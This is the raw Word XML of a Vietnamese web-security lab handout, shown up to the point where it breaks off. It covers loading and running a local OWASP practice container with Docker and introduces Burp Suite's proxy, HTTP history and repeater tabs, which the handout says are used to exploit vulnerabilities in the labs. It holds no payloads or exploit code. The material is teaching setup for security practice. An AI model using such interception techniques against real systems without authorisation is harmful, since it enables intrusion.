          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="751E424F" wp14:editId="3E07C244">
            <wp:extent cx="6151880" cy="773430"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:docPr id="1232248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48900" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="773430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35E3F5" w14:textId="7ED42299" w:rsidR="00F41059" w:rsidRPr="00D13F56" w:rsidRDefault="0030151F" w:rsidP="00D13F56">
      <w:r w:rsidRPr="00D13F56">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D13F56">
        <w:t>Cần chuẩn bị 2 công cụ chính sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1400C754" w14:textId="3E3187DA" w:rsidR="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc182909820"/>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="008C67B8">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:t>Docker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2FFBF03F" w14:textId="3B281AC5" w:rsidR="006265C0" w:rsidRDefault="0030151F" w:rsidP="00D25064">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="006265C0">
        <w:t>Môi tr</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="006265C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="006265C0">
        <w:t>ờng thực hành sử dụng docker đ</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="006265C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="006265C0">
        <w:t>ợc cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="006265C0">
        <w:t>, chạy lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B112F" w14:textId="4B181AB3" w:rsidR="006265C0" w:rsidRPr="006265C0" w:rsidRDefault="006265C0" w:rsidP="006265C0">
      <w:r w:rsidRPr="006265C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker load -i owasp.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7094E058" w14:textId="56A129F3" w:rsidR="006265C0" w:rsidRPr="00D25064" w:rsidRDefault="006265C0" w:rsidP="00D25064">
      <w:r w:rsidRPr="006265C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD343F0" wp14:editId="66E24745">
            <wp:extent cx="3600635" cy="311166"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2007905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05364" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3600635" cy="311166"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0B052" w14:textId="77777777" w:rsidR="00CB071E" w:rsidRDefault="0030151F" w:rsidP="00D25064">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:t>Kiểm tra image đ</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:t>ợc load vào</w:t>
      </w:r>
      <w:r w:rsidR="00E07BAA">
        <w:t>, chạy lệnh</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14107241" w14:textId="6728AFE4" w:rsidR="006265C0" w:rsidRDefault="00E07BAA" w:rsidP="00D25064">
      <w:r w:rsidRPr="00D25064">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C79EFDC" w14:textId="24485A02" w:rsidR="00F41059" w:rsidRPr="00D25064" w:rsidRDefault="0030151F" w:rsidP="00D25064">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="00D25064">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:t>Chạy môi tr</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00F41059" w:rsidRPr="00D25064">
        <w:t>ờng bài thực hành để thực hiện các bài lab phần A và B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5297EA" w14:textId="236DDE70" w:rsidR="006265C0" w:rsidRDefault="006265C0" w:rsidP="00D25064">
      <w:r w:rsidRPr="006265C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker run --rm -p 8000:8000 oswap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16006D97" w14:textId="4AB46E10" w:rsidR="00D25064" w:rsidRDefault="0030151F" w:rsidP="006265C0">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="006265C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="006265C0">
        <w:t xml:space="preserve"> Truy cập</w:t>
      </w:r>
      <w:r w:rsidR="006265C0">
        <w:t xml:space="preserve"> đến</w:t>
      </w:r>
      <w:r w:rsidR="00D25064" w:rsidRPr="006265C0">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E07BAA" w:rsidRPr="006265C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>localhost:8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D843D" w14:textId="6A412964" w:rsidR="00F41059" w:rsidRDefault="00D25064" w:rsidP="00F41059">
      <w:r w:rsidRPr="00D25064">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60DDC98D" wp14:editId="4F01FDD9">
            <wp:extent cx="6151880" cy="2405380"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1169126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26153" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="2405380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45083316" w14:textId="6A29D5E0" w:rsidR="00D305CF" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Bước 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D305CF" w:rsidRPr="0030151F">
        <w:t>Thực hiện đăng ký và đăng nhập tài khoản thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DCFC5" w14:textId="4045B2B9" w:rsidR="00D305CF" w:rsidRPr="00F41059" w:rsidRDefault="00D305CF" w:rsidP="00F41059">
      <w:r w:rsidRPr="00D305CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE63FBF" wp14:editId="4EC5D7E6">
            <wp:extent cx="6151880" cy="2334895"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
            <wp:docPr id="1742474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74437" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="2334895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6D5CF" w14:textId="3CDF30B6" w:rsidR="00F41059" w:rsidRDefault="00F41059" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc182909821"/>
      <w:r w:rsidRPr="00F41059">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="008C67B8">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41059">
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="43D23EEA" w14:textId="3559E31F" w:rsidR="006C0258" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:t xml:space="preserve">Burp Suite là một phần mềm sử dụng để hỗ trợ khai thác các lỗ hổng bảo mật web, đây là phần mềm có tích hợp nhiều công cụ khác nhau để thực hiện việc xâm nhập và kiểm tra web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F52942" w14:textId="24454E14" w:rsidR="00F41059" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D305CF" w:rsidRPr="0030151F">
        <w:t>Có thể sử dụng phần mềm Burp Suite hoặc thay thế bằng bất kỳ một phần mềm proxy nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B68925" w14:textId="1F6DE2FA" w:rsidR="006C0258" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:t xml:space="preserve">Trong các bài thực hành (lab) bên dưới, việc sử dụng 2 chức năng chính của phần mềm Burp Suite là </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> để tiến hành khai thác lỗ hổng trên các bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28D1CD" w14:textId="5BB07221" w:rsidR="006C0258" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r w:rsidRPr="0030151F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:t>Giao diện của burpsuite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DBFBA" w14:textId="77777777" w:rsidR="006C0258" w:rsidRDefault="006C0258" w:rsidP="00D305CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D1B38D9" wp14:editId="0860B27B">
            <wp:extent cx="6151880" cy="3175635"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="278939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39260" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="3175635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D305CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB56EAE" w14:textId="68D70561" w:rsidR="006C0258" w:rsidRDefault="0030151F" w:rsidP="00D305CF">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:t xml:space="preserve">Mở tab </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:t xml:space="preserve"> để xem giao diện proxy của ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="006C0258">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB15940" w14:textId="77777777" w:rsidR="006C0258" w:rsidRDefault="006C0258" w:rsidP="00D305CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A54538" wp14:editId="675D2E4A">
            <wp:extent cx="6151880" cy="3714115"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="1584196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96911" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="3714115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D305CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B35DD9" w14:textId="1D7D2F16" w:rsidR="006C0258" w:rsidRPr="006C0258" w:rsidRDefault="006C0258" w:rsidP="006C0258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*1: Intercept is off</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t xml:space="preserve"> là proxy đ</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t>ợc bật nh</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t xml:space="preserve">ng không chặn lại bất kỳ gói tin nào, lúc này proxy hoạt động để ghi nhận lịch sử câu request. Nếu </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intercept is on</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">tiến hành chặn gói tin gửi lên server (tuỳ theo mục đích sử dụng, có thể chỉnh sửa gói tin hoặc </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t>ọc thông tin rồi forward nó đi)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E2684" w14:textId="19AB4BAA" w:rsidR="00D305CF" w:rsidRPr="006C0258" w:rsidRDefault="006C0258" w:rsidP="006C0258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">*2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> browser</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0258">
        <w:t xml:space="preserve">một chức năng để thực hiện kiểm tra chức năng web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA70B6" w14:textId="29D874CA" w:rsidR="006C0258" w:rsidRDefault="0030151F" w:rsidP="006C0258">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:t xml:space="preserve">Chuyển qua tab nhỏ </w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP history</w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:t>. Ở đây sẽ l</w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="006C0258" w:rsidRPr="006C0258">
        <w:t xml:space="preserve">u trữ danh sách các câu truy vấn đến server, bao gồm request và response của câu đó. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF4CE6F" w14:textId="77777777" w:rsidR="0030151F" w:rsidRDefault="006C0258" w:rsidP="006C0258">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B4250F6" wp14:editId="68E773A3">
            <wp:extent cx="6151880" cy="3559810"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="185621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1714" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="3559810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4635A9" w14:textId="32790C41" w:rsidR="0030151F" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00896A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> Lịch sử HTTP đ</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>ợc ghi nhận</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0DE387" w14:textId="55A647C2" w:rsidR="0030151F" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00896A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*2:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> Nội dung Request</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26B24F" w14:textId="77777777" w:rsidR="0030151F" w:rsidRPr="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00896A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*3:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> Response đ</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>ợc trả về</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D199A6B" w14:textId="5535D451" w:rsidR="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve">Để thực hiện kiểm tra câu request nghi ngờ, click chuột phải vào câu đó, chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E77284" w14:textId="77777777" w:rsidR="0030151F" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="030CC59B" wp14:editId="237BEEBD">
            <wp:extent cx="6151880" cy="2879725"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1862267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67867" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6151880" cy="2879725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54008C4B" w14:textId="7559CDF0" w:rsidR="006C0258" w:rsidRDefault="0030151F" w:rsidP="0030151F">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve">Chuyển qua tab </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve">, ở giao diện này sẽ có 2 phần chính là </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t>. Tiến hành sửa request ở tab bên trái, chỉnh sửa các tham số nh</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:t xml:space="preserve"> url, các parameter,... sau đó nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="0030151F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
